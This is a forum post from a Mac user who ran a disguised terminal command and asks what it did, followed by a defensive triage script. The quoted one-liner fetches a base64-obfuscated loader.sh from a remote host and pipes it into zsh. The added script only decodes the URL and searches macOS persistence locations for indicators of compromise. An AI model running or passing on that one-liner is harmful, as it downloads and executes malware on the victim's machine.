u/BlockRoots

Hi everyone,

I made a stupid mistake and executed this command in terminal on my MacBook:

>!echo "GitHub-AppInstaller: https://dl.github.com/drive-file-stream/GitHubApplicationSetup.dmg" && curl -kfsSL $(echo 'aHR0cHM6Ly9mb2V3cGVlZTJ0b2wuY29tL2RlYnVnL2xvYWRlci5zaD9idWlsZD01MGU0YWZhY2VjYjcxMDAxZTdlZmJjODU2MTlmY2E0OQ=='|base64 -D)|zsh!<

The decoded URL downloads loader.sh from foewpeee2tol.com/debug/loader.sh?build=50e4afac..., which contains an obfuscated payload.

Questions:

- Can someone decode/decompress this payload safely and tell me exactly what it does?

- What data does it steal (passwords, keychain, browser data)?

- Does it install persistence (LaunchAgents, cron, profiles)?

- What should I check first?

My goal is to understand exactly what ran + complete cleanup steps.

Thanks for any help, feeling pretty dumb right now.

u/BlockRoots — 16 days ago
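A way to start on the "what should I check first" question without touching that URL again, as an added example that is not part of the original post. It decodes the base64 argument from the pasted one-liner to stdout only (never into a shell), pulls out the host so it can be blocked and searched for in DNS/proxy logs, and then sweeps the standard macOS persistence locations (LaunchAgents, LaunchDaemons, cron, configuration profiles) for recent changes and for files that reference the host, `loader.sh`, or the `base64 -D` idiom. The function names and IOC strings are this example's own; the persistence paths are standard macOS locations, not something the post says the loader writes to, and the decoded URL is computed from the post's base64 string rather than asserted.

```shell
#!/bin/sh
# Added triage helper, not part of the original post. It decodes the base64
# argument from the pasted one-liner WITHOUT fetching or executing anything,
# then enumerates standard macOS persistence locations for recent changes and
# greps them for strings tied to the one-liner. Function names and the IOC
# strings are this example's own; the persistence paths are standard macOS
# locations, not something the post says the loader uses.

# Base64 argument copied verbatim from the pasted command.
ENCODED='aHR0cHM6Ly9mb2V3cGVlZTJ0b2wuY29tL2RlYnVnL2xvYWRlci5zaD9idWlsZD01MGU0YWZhY2VjYjcxMDAxZTdlZmJjODU2MTlmY2E0OQ=='

# Decode only. The original piped the result into zsh; here it goes to stdout.
# --decode is understood by both macOS and GNU base64 (the post used macOS's -D).
decode_target() {
    printf '%s' "$1" | base64 --decode
}

# Host part of a URL, for firewall blocks and DNS/proxy log searches.
url_host() {
    printf '%s' "$1" | sed -E 's#^[A-Za-z][A-Za-z0-9+.-]*://([^/?:]+).*#\1#'
}

# Persistence locations to check first (user LaunchAgents, system agents and
# daemons, cron). Configuration profiles are handled by `profiles` below.
persistence_dirs() {
    cat <<EOF
$HOME/Library/LaunchAgents
/Library/LaunchAgents
/Library/LaunchDaemons
/etc/cron.d
/var/at/tabs
EOF
}

# Files under those locations modified within the last $1 days (default 30).
recent_persistence() {
    days="${1:-30}"
    persistence_dirs | while IFS= read -r d; do
        [ -d "$d" ] || continue
        find "$d" -type f -mtime "-$days" 2>/dev/null
    done
    # Per-user crontab and installed configuration profiles; both fail
    # harmlessly when empty or when run on a non-macOS host.
    crontab -l 2>/dev/null || true
    profiles list 2>/dev/null || true
}

# Recursively grep directory $1 for strings that tie a file to this incident:
# the decoded host ($2), the loader name, and the decode-and-pipe idiom itself.
find_iocs() {
    grep -rl -e "$2" -e 'loader.sh' -e 'base64 -D' "$1" 2>/dev/null || true
}

URL=$(decode_target "$ENCODED")
HOST=$(url_host "$URL")
printf 'Decoded target (NOT fetched): %s\nHost to block and search logs for: %s\n' "$URL" "$HOST"

# Run the local sweep only when asked, since it is macOS-specific.
if [ "${1:-}" = "--scan" ]; then
    echo '--- persistence files modified in the last 30 days ---'
    recent_persistence 30
    echo '--- files referencing the incident IOCs ---'
    persistence_dirs | while IFS= read -r d; do
        [ -d "$d" ] && find_iocs "$d" "$HOST"
    done
    # Shell history shows whether the one-liner (or a follow-up) ran more than once.
    grep -n -e "$HOST" -e 'base64 -D' "$HOME/.zsh_history" 2>/dev/null || true
fi
```

Run it with no arguments to see only the decoded URL and host; run it with `--scan` on the affected Mac to list recently changed persistence files, the files among them that reference the host, and matching zsh history lines. Anything it prints is a candidate to inspect, not proof of compromise, and an empty listing does not prove the loader wrote nowhere else, since a second-stage payload can persist in places this sweep does not cover.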